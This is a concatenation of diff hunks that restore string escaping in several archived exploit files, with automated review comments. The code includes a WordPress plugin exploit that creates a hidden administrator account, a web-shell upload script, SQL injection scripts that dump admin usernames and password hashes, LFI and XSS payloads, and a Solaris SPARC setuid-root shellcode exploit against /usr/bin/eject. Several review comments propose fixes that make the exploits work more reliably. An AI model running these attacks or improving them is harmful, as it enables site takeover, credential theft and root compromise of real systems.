'content-type': content_type,
|
||||
'content-length': str(len(bodyupload)) }
|
||||
|
||||
try:
|
||||
req = urllib2.Request(url_symposium_upload+\'index.php\', bodyupload, headers)
|
||||
req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
|
||||
response = urllib2.urlopen(req)
|
||||
read = response.read()
|
||||
|
||||
if \"error\" in read or read == \"0\" or read == \"\":
|
||||
print(\"[X] Upload Failed :(\")
|
||||
if "error" in read or read == "0" or read == "":
|
||||
print("[X] Upload Failed :(")
|
||||
else:
|
||||
print(\"[!] Shell Uploaded\")
|
||||
print(\"[!] Location: \"+url_symposium_upload+randDirName+randShellName+\".php\\n\")
|
||||
print("[!] Shell Uploaded")
|
||||
print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
|
||||
|
||||
except urllib2.HTTPError as e:
|
||||
print(\"[X] \"+str(e))
|
||||
print("[X] "+str(e))
|
||||
except urllib2.URLError as e:
|
||||
print(\"[X] Connection Error: \"+str(e))
|
||||
print("[X] Connection Error: "+str(e))
|
||||
|
|
|
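Review bot: the success test `if "error" in read or read == "0" or read == ""` flags a successful upload as failed whenever the handler's JSON reply contains the substring `error` anywhere (an `"error":null` field is enough) and reports success for any non-empty reply that happens not to contain it; parse the JSON and check the returned file entry instead. The reported location `url_symposium_upload+randDirName+randShellName+".php"` has no `/` between the directory and the file name even though the upload was requested with `uploader_dir` set to `'./'+randDirName`, so the printed URL is wrong unless the handler ignores that directory; add the separator or derive the path from the response.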
@ -10,14 +10,14 @@
|
|||
#
|
||||
# --------------------------------------------------------------------
|
||||
#
|
||||
# The vulnerable function is located on \"wpmarketplace/libs/cart.php\" file:
|
||||
# The vulnerable function is located on "wpmarketplace/libs/cart.php" file:
|
||||
#
|
||||
# function ajaxinit(){
|
||||
# if(isset($_POST[\'action\']) && $_POST[\'action\']==\'wpmp_pp_ajax_call\'){
|
||||
# if(function_exists($_POST[\'execute\']))
|
||||
# call_user_func($_POST[\'execute\'],$_POST);
|
||||
# if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){
|
||||
# if(function_exists($_POST['execute']))
|
||||
# call_user_func($_POST['execute'],$_POST);
|
||||
# else
|
||||
# echo __(\"function not defined!\",\"wpmarketplace\");
|
||||
# echo __("function not defined!","wpmarketplace");
|
||||
# die();
|
||||
# }
|
||||
#}
|
||||
|
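Review bot: the root cause in `ajaxinit()` deserves a more precise statement: `function_exists($_POST['execute'])` followed by `call_user_func($_POST['execute'],$_POST)` lets an unauthenticated POST invoke any defined PHP or WordPress function whose first parameter accepts an array, with the entire `$_POST` array as that argument. `wp_insert_user($userdata)` takes exactly such an array keyed by `user_login`, `user_pass` and `role`, which is why the script's POST body creates an administrator; and because the check runs from an init-time hook with no nonce or capability check, any page on the site is a valid endpoint.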
@ -25,8 +25,8 @@
|
|||
# Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook).
|
||||
# wpmp_pp_ajax_call() call functions by call_user_func() through POST data:
|
||||
#
|
||||
# if (function_exists($_POST[\'execute\']))
|
||||
# call_user_func($_POST[\'execute\'], $_POST);
|
||||
# if (function_exists($_POST['execute']))
|
||||
# call_user_func($_POST['execute'], $_POST);
|
||||
# else
|
||||
# ...
|
||||
# ...
|
||||
|
@ -61,7 +61,7 @@
|
|||
#
|
||||
# ---------------------------------------------------------------------
|
||||
#
|
||||
# Dork google: index of \"wpmarketplace\"
|
||||
# Dork google: index of "wpmarketplace"
|
||||
#
|
||||
# Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6
|
||||
#
|
||||
|
@ -76,8 +76,8 @@ import optparse
|
|||
|
||||
# Check url
|
||||
def checkurl(url):
|
||||
if url[:8] != \"https://\" and url[:7] != \"http://\":
|
||||
print(\'[X] You must insert http:// or https:// procotol\')
|
||||
if url[:8] != "https://" and url[:7] != "http://":
|
||||
print('[X] You must insert http:// or https:// procotol')
|
||||
sys.exit(1)
|
||||
else:
|
||||
return url
|
||||
|
@ -85,29 +85,29 @@ def checkurl(url):
|
|||
# Check if file exists and has readable
|
||||
def checkfile(file):
|
||||
if not os.path.isfile(file) and not os.access(file, os.R_OK):
|
||||
print \'[X] \'+file+\' file is missing or not readable\'
|
||||
print '[X] '+file+' file is missing or not readable'
|
||||
sys.exit(1)
|
||||
else:
|
||||
return file
|
||||
|
||||
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
|
||||
return \'\'.join(random.choice(chars) for _ in range(size))
|
||||
return ''.join(random.choice(chars) for _ in range(size))
|
||||
|
||||
banner = \"\"\"
|
||||
banner = """
|
||||
___ ___ __
|
||||
| Y .-----.----.--| .-----.----.-----.-----.-----.
|
||||
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|
||||
|. / \\ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|
||||
|: | |__|
|
||||
|::.|:. |
|
||||
`--- ---\'
|
||||
`--- ---'
|
||||
___ ___ __ __ __
|
||||
| Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----.
|
||||
|. | _ | _| <| -__| _| _ | | _ | __| -__|
|
||||
|. \\_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____|
|
||||
|. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____|
|
||||
|: | | |__|
|
||||
|::.|:. |
|
||||
`--- ---\'
|
||||
`--- ---'
|
||||
WP Marketplace
|
||||
R3m0t3 C0d3 Ex3cut10n
|
||||
(Add WP Admin)
|
||||
|
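Review bot: `checkfile` carries the same `and`-instead-of-`or` bug as the WP Symposium script (an existing but unreadable file passes the check), and here it is dead code: this exploit takes only a target URL and a timeout and never reads a local file, so the function can simply be removed instead of being copied along with the banner helpers.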
@ -126,14 +126,14 @@ banner = \"\"\"
|
|||
https://twitter.com/homelabit
|
||||
https://plus.google.com/+HomelabIt1/
|
||||
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
|
||||
\"\"\"
|
||||
"""
|
||||
|
||||
commandList = optparse.OptionParser(\'usage: %prog -t URL [--timeout sec]\')
|
||||
commandList.add_option(\'-t\', \'--target\', action=\"store\",
|
||||
help=\"Insert TARGET URL: http[s]://www.victim.com[:PORT]\",
|
||||
commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
|
||||
commandList.add_option('-t', '--target', action="store",
|
||||
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
|
||||
)
|
||||
commandList.add_option(\'--timeout\', action=\"store\", default=10, type=\"int\",
|
||||
help=\"[Timeout Value] - Default 10\",
|
||||
commandList.add_option('--timeout', action="store", default=10, type="int",
|
||||
help="[Timeout Value] - Default 10",
|
||||
)
|
||||
|
||||
options, remainder = commandList.parse_args()
|
||||
|
@ -154,30 +154,30 @@ socket.setdefaulttimeout(timeout)
|
|||
username = id_generator()
|
||||
pwd = id_generator()
|
||||
|
||||
body = urllib.urlencode({\'action\' : \'wpmp_pp_ajax_call\',
|
||||
\'execute\' : \'wp_insert_user\',
|
||||
\'user_login\' : username,
|
||||
\'user_pass\' : pwd,
|
||||
\'role\' : \'administrator\'})
|
||||
body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call',
|
||||
'execute' : 'wp_insert_user',
|
||||
'user_login' : username,
|
||||
'user_pass' : pwd,
|
||||
'role' : 'administrator'})
|
||||
|
||||
headers = {\'User-Agent\': \'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\'}
|
||||
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
|
||||
|
||||
print \"[+] Tryng to connect to: \"+host
|
||||
print "[+] Tryng to connect to: "+host
|
||||
try:
|
||||
req = urllib2.Request(host+\"/\", body, headers)
|
||||
req = urllib2.Request(host+"/", body, headers)
|
||||
response = urllib2.urlopen(req)
|
||||
html = response.read()
|
||||
|
||||
if html == \"\":
|
||||
print(\"[!] Account Added\")
|
||||
print(\"[!] Location: \"+host+\"/wp-login.php\")
|
||||
print(\"[!] Username: \"+username)
|
||||
print(\"[!] Password: \"+pwd)
|
||||
if html == "":
|
||||
print("[!] Account Added")
|
||||
print("[!] Location: "+host+"/wp-login.php")
|
||||
print("[!] Username: "+username)
|
||||
print("[!] Password: "+pwd)
|
||||
else:
|
||||
print(\"[X] Exploitation Failed :(\")
|
||||
print("[X] Exploitation Failed :(")
|
||||
|
||||
except urllib2.HTTPError as e:
|
||||
print(\"[X] \"+str(e))
|
||||
print("[X] "+str(e))
|
||||
except urllib2.URLError as e:
|
||||
print(\"[X] Connection Error: \"+str(e))
|
||||
print("[X] Connection Error: "+str(e))
|
||||
|
||||
|
|
|
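Review bot: `Tryng` in the restored `print "[+] Tryng to connect to: "+host` is a typo for `Trying`, carried over unchanged from the old line. The same hunk mixes that `print` statement with `print(...)` calls on the lines below it, so the file only runs under Python 2; the unescaped `'wpmp_pp_ajax_call'` and `'administrator'` dictionary values themselves are restored correctly.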
@ -1,8 +1,8 @@
|
|||
. . .
|
||||
._ | _. .|_ _. _.;_/
|
||||
[_)|(_]\\_|[ )(_](_.| \\.net
|
||||
[_)|(_]\_|[ )(_](_.| \.net
|
||||
| ._|
|
||||
\"QDBlog v0.4 - MULTIPLE VULNERABILITIES\"
|
||||
"QDBlog v0.4 - MULTIPLE VULNERABILITIES"
|
||||
by Omni
|
||||
|
||||
1) Infos
|
||||
|
@ -29,8 +29,8 @@ Team : Playhack.net Security
|
|||
|
||||
[ authenticate.php Script - Line 7 - 9 ]
|
||||
|
||||
$sql = \"SELECT permissions, username FROM $prefix\".\"auth WHERE username = \'\" . $_POST[\'username\'] . \"\' AND password =
|
||||
MD5(\'\".$_POST[\'wordpass\'].\"\');\";
|
||||
$sql = "SELECT permissions, username FROM $prefix"."auth WHERE username = '" . $_POST['username'] . "' AND password =
|
||||
MD5('".$_POST['wordpass']."');";
|
||||
|
||||
$query = mysql_query($sql, $conn);
|
||||
|
||||
|
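Review bot: the two-line `$sql = "SELECT permissions, username FROM $prefix"."auth WHERE username = '" . $_POST['username'] . "' AND password =` / `MD5('".$_POST['wordpass']."');";` is one PHP statement wrapped by the advisory's column width; a reader copying it should join the lines. With the escapes removed it also shows plainly why the following `mysql_query($sql, $conn)` is injectable: both `$_POST` values are concatenated into the query text rather than bound as parameters, which is the defect the advisory describes.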
@ -42,7 +42,7 @@ properly sanitized before being used, so an attacker can inject SQL code and gai
|
|||
--- [ PoC ] ---
|
||||
===============
|
||||
|
||||
Put in the username field (in login.php) a code like 1\' OR \'1\' = \'1\' # and in the password filed what you want.
|
||||
Put in the username field (in login.php) a code like 1' OR '1' = '1' # and in the password filed what you want.
|
||||
Click.. login and.. have fun :D
|
||||
|
||||
--- [ Local File Inclusion ] ---
|
||||
|
@ -53,7 +53,7 @@ index.php as shown below:
|
|||
|
||||
[ categories.php script - Line 2 ]
|
||||
|
||||
include(\"themes/$theme/cat_top.php\");
|
||||
include("themes/$theme/cat_top.php");
|
||||
|
||||
[ end index.php script ]
|
||||
|
||||
|
@ -67,9 +67,9 @@ http://remote_host/qdblog/categories.php?theme=../../../../../../../etc/passwd%0
|
|||
|
||||
Take again a look to categories.php:
|
||||
|
||||
in this file there is \"an other vulnerability\", File Traversal:
|
||||
in this file there is "an other vulnerability", File Traversal:
|
||||
|
||||
Line 3 : $file1 = fopen(\"themes/$theme/cat_mid.html\", \"r\");
|
||||
Line 3 : $file1 = fopen("themes/$theme/cat_mid.html", "r");
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -4,26 +4,26 @@
|
|||
#
|
||||
require LWP::UserAgent;
|
||||
|
||||
print \"#
|
||||
print "#
|
||||
# phpEventCalendar <= v0.2.3 SQL Injection Exploit
|
||||
# By Iron - ironwarez.info
|
||||
# Thanks to Silentz for the help :)
|
||||
# Greets to everyone at RootShell Security Group & dHack
|
||||
#
|
||||
# Example target url: http://www.target.com/phpeventcalendar/
|
||||
Target url?\";
|
||||
Target url?";
|
||||
chomp($target=<stdin>);
|
||||
if($target !~ /^http:\\/\\//)
|
||||
if($target !~ /^http:\/\//)
|
||||
{
|
||||
$target = \"http://\".$target;
|
||||
$target = "http://".$target;
|
||||
}
|
||||
if($target !~ /\\/$/)
|
||||
if($target !~ /\/$/)
|
||||
{
|
||||
$target .= \"/\";
|
||||
$target .= "/";
|
||||
}
|
||||
print \"User id to retrieve name/password from? (1 = admin)\";
|
||||
print "User id to retrieve name/password from? (1 = admin)";
|
||||
chomp($target_id=<stdin>);
|
||||
$target .= \"eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=\".$target_id;
|
||||
$target .= "eventdisplay.php?id=-999%20UNION%20SELECT%20username,password,password%20FROM%20pec_users%20WHERE%20uid=".$target_id;
|
||||
|
||||
$ua = LWP::UserAgent->new;
|
||||
$ua->timeout(10);
|
||||
|
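Review bot: the regex escapes now read as the author wrote them: `if($target !~ /^http:\/\//)` and `if($target !~ /\/$/)` use `\/` to escape the slash delimiter, whereas the old doubled `\\/` would have matched a literal backslash before the slash. The two URL normalisation checks are therefore correct again after this change.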
@ -33,20 +33,20 @@ $response = $ua->get($target);
|
|||
|
||||
if ($response->is_success)
|
||||
{
|
||||
if($response->content =~ /<span class=\"display_header\">(.*)<\\/span>/i)
|
||||
if($response->content =~ /<span class="display_header">(.*)<\/span>/i)
|
||||
{
|
||||
($username,$password) = split(/,/,$1);
|
||||
print \"Username: \".$username;
|
||||
print \"\\nPassword: \".$password;
|
||||
print "Username: ".$username;
|
||||
print "\nPassword: ".$password;
|
||||
}
|
||||
else
|
||||
{
|
||||
print \"\\nUnable to retrieve username/password.\";
|
||||
print "\nUnable to retrieve username/password.";
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
die \"Error: \".$response->status_line;
|
||||
die "Error: ".$response->status_line;
|
||||
}
|
||||
|
||||
# milw0rm.com [2007-07-01]
|
||||
|
|
|
@ -26,52 +26,52 @@
|
|||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
system(\"color 02\");
|
||||
print \"\\t\\t############################################################\\n\\n\";
|
||||
print \"\\t\\t# PHP Booking Calendar 10 d - Remote SQL Inj Exploit #\\n\\n\";
|
||||
print \"\\t\\t# by Stack #\\n\\n\";
|
||||
print \"\\t\\t############################################################\\n\\n\";
|
||||
system("color 02");
|
||||
print "\t\t############################################################\n\n";
|
||||
print "\t\t# PHP Booking Calendar 10 d - Remote SQL Inj Exploit #\n\n";
|
||||
print "\t\t# by Stack #\n\n";
|
||||
print "\t\t############################################################\n\n";
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
use LWP::UserAgent;
|
||||
die \"Example: perl $0 http://victim.com/path/\\n\" unless @ARGV;
|
||||
system(\"color f\");
|
||||
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
|
||||
system("color f");
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
#the username of news manages
|
||||
$user=\"username\";
|
||||
$user="username";
|
||||
#the pasword of news manages
|
||||
$pass=\"passwd\";
|
||||
$pass="passwd";
|
||||
#the tables of news manages
|
||||
$tab=\"booking_user\";
|
||||
$fil=\"details_view.php\";
|
||||
$varo=\"event_id\";
|
||||
$tab="booking_user";
|
||||
$fil="details_view.php";
|
||||
$varo="event_id";
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
$b = LWP::UserAgent->new() or die \"Could not initialize browser\\n\";
|
||||
$b->agent(\'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\');
|
||||
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
|
||||
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
$host = $ARGV[0] . \"/\".$fil.\"?\".$varo.\"=-1+union+all+select+1,1,concat_ws(char(58),char(58),\".$user.\",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,\".$pass.\",1,1,1 from+\".$tab.\"/*\";
|
||||
$host = $ARGV[0] . "/".$fil."?".$varo."=-1+union+all+select+1,1,concat_ws(char(58),char(58),".$user.",char(58),char(58),char(58),char(58)),1,1,1,1,1,1,".$pass.",1,1,1 from+".$tab."/*";
|
||||
$res = $b->request(HTTP::Request->new(GET=>$host));
|
||||
$answer = $res->content;
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
if ($answer =~ /::(.*?)::::/){
|
||||
print \"\\nBrought to you by v4-team.com...\\n\";
|
||||
print \"\\n[+] Admin User : $1\";
|
||||
print "\nBrought to you by v4-team.com...\n";
|
||||
print "\n[+] Admin User : $1";
|
||||
}
|
||||
########################################
|
||||
#----------------------------------------------------------------------------#
|
||||
########################################
|
||||
if ($answer =~/([0-9a-fA-F]{32})/){print \"\\n[+] Admin Hash : $1\\n\\n\";
|
||||
print \"\\t\\t# Exploit has ben aported user and password hash #\\n\\n\";}
|
||||
else{print \"\\n[-] Exploit Failed...\\n\";}
|
||||
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
|
||||
print "\t\t# Exploit has ben aported user and password hash #\n\n";}
|
||||
else{print "\n[-] Exploit Failed...\n";}
|
||||
########################################
|
||||
#-------------------Exploit exploited by Stack --------------------#
|
||||
########################################
|
||||
|
|
|
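Review bot: the restored `print "\t\t#...\n\n"` lines now emit tab and newline escapes instead of the literal characters `\t` and `\n`, which is what the banner layout expects. Visible in the same hunk but not introduced here: `system("color 02")` and `system("color f")` are cmd.exe commands and print a shell error on non-Windows hosts, and `Exploit has ben aported` is a typo.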
@ -18,13 +18,13 @@
|
|||
####################
|
||||
2. Vulnerabilities:
|
||||
####################
|
||||
2.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter.
|
||||
2.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
|
||||
2.1.1. Exploit:
|
||||
Check the exploit/POC section.
|
||||
2.2. File (image) Upload without premission.
|
||||
2.2.1. Exploit:
|
||||
Check the exploit/POC section.
|
||||
2.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\".
|
||||
2.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
|
||||
2.3.1. Exploit:
|
||||
Check the exploit/POC section.
|
||||
|
||||
|
@ -32,7 +32,7 @@
|
|||
3. Exploits/POCs:
|
||||
####################
|
||||
Original Exploit URL: http://bugreport.ir/index.php?/46/exploit
|
||||
3.1. Local File Inclusion (LFI) in \"/functions.php\" in \"FORUM_LANGUAGE\" parameter.
|
||||
3.1. Local File Inclusion (LFI) in "/functions.php" in "FORUM_LANGUAGE" parameter.
|
||||
-------------
|
||||
LFI:
|
||||
http://[URL]/[Forum Path]/functions.php?FORUM_LANGUAGE=/../../../../../../../../../../etc/passwd
|
||||
|
@ -42,15 +42,15 @@
|
|||
Uploader link:
|
||||
http://[URL]/[Forum Path]/upload.php
|
||||
-------------
|
||||
3.3. Cross Site Scripting (XSS). Reflected XSS attack in \"search.php\".
|
||||
3.3. Cross Site Scripting (XSS). Reflected XSS attack in "search.php".
|
||||
-------------
|
||||
<form action=\"http://[URL]/[Forum path]/search.php\" method=\"post\">
|
||||
<form action="http://[URL]/[Forum path]/search.php" method="post">
|
||||
<tr><td class=g>XSS: <small></td><tr>
|
||||
"<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT>
|
||||
<br><tr><td class=g><INPUT TYPE=\"text\" class=\"txt\" NAME=\"search\" SIZE=\"30\" MAXLENGTH=\"100\"><br/>
|
||||
<tr><td class=g><INPUT TYPE=\"RADIO\" checked NAME=\"type\" VALUE=\"themen\"> search only in topics</td></tr>
|
||||
<tr><td class=g><INPUT TYPE=\"RADIO\" NAME=\"type\" VALUE=\"beitraege\"> search in topics and answers</td></tr>
|
||||
<INPUT TYPE=\"SUBMIT\" class=\"btn\" NAME=\"submit\" VALUE=\"submit\"></td></tr>
|
||||
<br><tr><td class=g><INPUT TYPE="text" class="txt" NAME="search" SIZE="30" MAXLENGTH="100"><br/>
|
||||
<tr><td class=g><INPUT TYPE="RADIO" checked NAME="type" VALUE="themen"> search only in topics</td></tr>
|
||||
<tr><td class=g><INPUT TYPE="RADIO" NAME="type" VALUE="beitraege"> search in topics and answers</td></tr>
|
||||
<INPUT TYPE="SUBMIT" class="btn" NAME="submit" VALUE="submit"></td></tr>
|
||||
-------------
|
||||
####################
|
||||
4. Solution:
|
||||
|
|
|
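Review bot: the context line `"<SCRIPT>alert(/BugReport.ir-XSS/.source)</SCRIPT>` keeps a bare leading `"` and is shown as unchanged, while every other `"` in the surrounding `<form>` and `<INPUT>` lines was converted from `\"`; worth confirming that the stored text really had a plain quote there rather than an escape the conversion missed.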
@ -26,23 +26,23 @@
|
|||
|
||||
#define NOP 0xac15a16e
|
||||
|
||||
#define VULPROG \"/usr/bin/eject\"
|
||||
#define VULPROG "/usr/bin/eject"
|
||||
|
||||
char shellcode[] = /* from scz\'s funny shellcode for SPARC */
|
||||
\"\\x90\\x08\\x3f\\xff\\x82\\x10\\x20\\x17\\x91\\xd0\\x20\\x08\" /* setuid(0) */
|
||||
\"\\xaa\\x1d\\x40\\x15\\x90\\x05\\x60\\x01\\x92\\x10\\x20\\x09\" /* dup2(1,2) */
|
||||
\"\\x94\\x05\\x60\\x02\\x82\\x10\\x20\\x3e\\x91\\xd0\\x20\\x08\"
|
||||
\"\\x20\\x80\\x49\\x73\\x20\\x80\\x62\\x61\\x20\\x80\\x73\\x65\\x20\\x80\\x3a\\x29\"
|
||||
\"\\x7f\\xff\\xff\\xff\\x94\\x1a\\x80\\x0a\\x90\\x03\\xe0\\x34\\x92\\x0b\\x80\\x0e\"
|
||||
\"\\x9c\\x03\\xa0\\x08\\xd0\\x23\\xbf\\xf8\\xc0\\x23\\xbf\\xfc\\xc0\\x2a\\x20\\x07\"
|
||||
\"\\x82\\x10\\x20\\x3b\\x91\\xd0\\x20\\x08\\x90\\x1b\\xc0\\x0f\\x82\\x10\\x20\\x01\"
|
||||
\"\\x91\\xd0\\x20\\x08\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\xff\";
|
||||
char shellcode[] = /* from scz's funny shellcode for SPARC */
|
||||
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* setuid(0) */
|
||||
"\xaa\x1d\x40\x15\x90\x05\x60\x01\x92\x10\x20\x09" /* dup2(1,2) */
|
||||
"\x94\x05\x60\x02\x82\x10\x20\x3e\x91\xd0\x20\x08"
|
||||
"\x20\x80\x49\x73\x20\x80\x62\x61\x20\x80\x73\x65\x20\x80\x3a\x29"
|
||||
"\x7f\xff\xff\xff\x94\x1a\x80\x0a\x90\x03\xe0\x34\x92\x0b\x80\x0e"
|
||||
"\x9c\x03\xa0\x08\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\xc0\x2a\x20\x07"
|
||||
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
|
||||
"\x91\xd0\x20\x08\x2f\x62\x69\x6e\x2f\x73\x68\xff";
|
||||
|
||||
/* get current stack point address */
|
||||
|
||||
long get_sp(void)
|
||||
{
|
||||
__asm__(\"mov %sp,%i0\");
|
||||
__asm__("mov %sp,%i0");
|
||||
}
|
||||
|
||||
/* prints a long to a string */
|
||||
|
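Review bot: the restored `"\x90\x08\x3f\xff\x82\x10\x20\x17..."` strings are C hex escapes again; the previous `\\x90` form would have been four literal characters per byte and `char shellcode[]` would have had the wrong length. Separately, `long get_sp(void) { __asm__("mov %sp,%i0"); }` has no `return` and relies on `%i0` being the SPARC return register, which compilers warn about; a comment stating that would help readers.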
@ -78,14 +78,14 @@ void create_shellbuf(char* shellbuf, int align, int retloc)
|
|||
/* check align parameter */
|
||||
|
||||
if (align < 0 || align > 3) {
|
||||
printf(\"Error: align is %d, it should be between 0 and 3\\n\", align);
|
||||
printf("Error: align is %d, it should be between 0 and 3\n", align);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
/* check retloc parameter */
|
||||
|
||||
if (contains_zero(retloc) || contains_zero(retloc+2) ) {
|
||||
printf(\"Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\\n\", retloc, retloc+2);
|
||||
printf("Error: retloc (0x%x) or retloc+2 (0x%x) contains a zero byte\n", retloc, retloc+2);
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
@ -127,7 +127,7 @@ void create_shellbuf(char* shellbuf, int align, int retloc)
|
|||
/* at this point the shell buffer should be exactly SHELL bytes long, including the null-terminator */
|
||||
|
||||
if (strlen(shellbuf) + 1 != SHELL) {
|
||||
printf(\"Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\\n\",
|
||||
printf("Error: The shell buffer is %d bytes long. It should be %d bytes. Something went terribly wrong...\n",
|
||||
strlen(shellbuf)+1, SHELL);
|
||||
exit(1);
|
||||
}
|
||||
|
@ -145,32 +145,32 @@ void execute_vulnprog(char* pattern, char* shellbuf)
|
|||
/* create message files */
|
||||
|
||||
if (strlen(pattern) > 512) {
|
||||
printf(\"Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\\n\", strlen(pattern));
|
||||
printf("Warning: The pattern is %d bytes long. Only the first 512 bytes will be used.\n", strlen(pattern));
|
||||
}
|
||||
|
||||
if ( !(fp = fopen(\"messages.po\", \"w+\")) ) {
|
||||
perror(\"Error openning messages.po for writing.\");
|
||||
if ( !(fp = fopen("messages.po", "w+")) ) {
|
||||
perror("Error openning messages.po for writing.");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
fprintf(fp, \"domain \\\"messages\\\"\\n\");
|
||||
fprintf(fp, \"msgid \\\"usage: %%s [-fndq] [name | nickname]\\\\n\\\"\\n\");
|
||||
fprintf(fp, \"msgstr \\\"%s\\\\n\\\"\", pattern);
|
||||
fprintf(fp, "domain \"messages\"\n");
|
||||
fprintf(fp, "msgid \"usage: %%s [-fndq] [name | nickname]\\n\"\n");
|
||||
fprintf(fp, "msgstr \"%s\\n\"", pattern);
|
||||
fclose(fp);
|
||||
|
||||
system(\"/usr/bin/msgfmt messages.po\");
|
||||
system(\"cp messages.mo SUNW_OST_OSCMD\");
|
||||
system(\"cp messages.mo SUNW_OST_OSLIB\");
|
||||
system("/usr/bin/msgfmt messages.po");
|
||||
system("cp messages.mo SUNW_OST_OSCMD");
|
||||
system("cp messages.mo SUNW_OST_OSLIB");
|
||||
|
||||
/* prepere the environment for the VULNPROG process */
|
||||
|
||||
env[0] = \"NLSPATH=:.\";
|
||||
env[0] = "NLSPATH=:.";
|
||||
env[1] = shellbuf; /* put the shellbuf in env */
|
||||
env[2] = NULL; /* end of env */
|
||||
|
||||
/* execute the vulnerable program using our custom environment */
|
||||
|
||||
execle(VULPROG, VULPROG, \"-x\", NULL, env);
|
||||
execle(VULPROG, VULPROG, "-x", NULL, env);
|
||||
}
|
||||
|
||||
|
||||
|
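Review bot: in `fprintf(fp, "msgid \"usage: %%s [-fndq] [name | nickname]\\n\"\n");` the `\\n` is meant to write the two characters `\n` into messages.po (a .po escape that msgfmt decodes), while the trailing `\n` is a real newline; the conversion preserved that distinction, and the same holds for the `msgstr` line. Spelling nits on the neighbouring lines: `openning` in the `perror` message and `prepere` in the comment.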
@ -178,18 +178,18 @@ void execute_vulnprog(char* pattern, char* shellbuf)
|
|||
|
||||
void usage(char *prg)
|
||||
{
|
||||
printf(\"Usage:\\n\");
|
||||
printf(\" %s [command] [options]\\n\\n\", prg);
|
||||
printf(\"Commands:\\n\");
|
||||
printf(\" dump Dumps the stack\\n\");
|
||||
printf(\" shell Dumps the shell buffer\\n\");
|
||||
printf(\" exploit Exploits /usr/bin/eject\\n\\n\");
|
||||
printf(\"Options:\\n\");
|
||||
printf(\" --num=96 Number of words to dump from the stack\\n\");
|
||||
printf(\" --align=2 Sets the alignment (0, 1, 2 or 3)\\n\");
|
||||
printf(\" --shellofs=-6 Offset of the shell buffer\\n\");
|
||||
printf(\" --retlocofs=-4 Retloc adjustment (must be divisible by 4)\\n\");
|
||||
printf(\" --retloc=0xeffffa3c Location of the return address\\n\");
|
||||
printf("Usage:\n");
|
||||
printf(" %s [command] [options]\n\n", prg);
|
||||
printf("Commands:\n");
|
||||
printf(" dump Dumps the stack\n");
|
||||
printf(" shell Dumps the shell buffer\n");
|
||||
printf(" exploit Exploits /usr/bin/eject\n\n");
|
||||
printf("Options:\n");
|
||||
printf(" --num=96 Number of words to dump from the stack\n");
|
||||
printf(" --align=2 Sets the alignment (0, 1, 2 or 3)\n");
|
||||
printf(" --shellofs=-6 Offset of the shell buffer\n");
|
||||
printf(" --retlocofs=-4 Retloc adjustment (must be divisible by 4)\n");
|
||||
printf(" --retloc=0xeffffa3c Location of the return address\n");
|
||||
|
||||
exit(0);
|
||||
}
|
||||
|
@ -212,20 +212,20 @@ main(int argc, char **argv)
|
|||
usage(argv[0]);
|
||||
}
|
||||
|
||||
if (!strncmp(argv[1], \"dump\", 4)) { dump = 1; }
|
||||
else if(!strncmp(argv[1], \"shell\", 5)) { shell = 1; }
|
||||
else if(!strncmp(argv[1], \"exploit\", 7)) { exploit = 1; }
|
||||
if (!strncmp(argv[1], "dump", 4)) { dump = 1; }
|
||||
else if(!strncmp(argv[1], "shell", 5)) { shell = 1; }
|
||||
else if(!strncmp(argv[1], "exploit", 7)) { exploit = 1; }
|
||||
else {
|
||||
usage(argv[0]);
|
||||
}
|
||||
|
||||
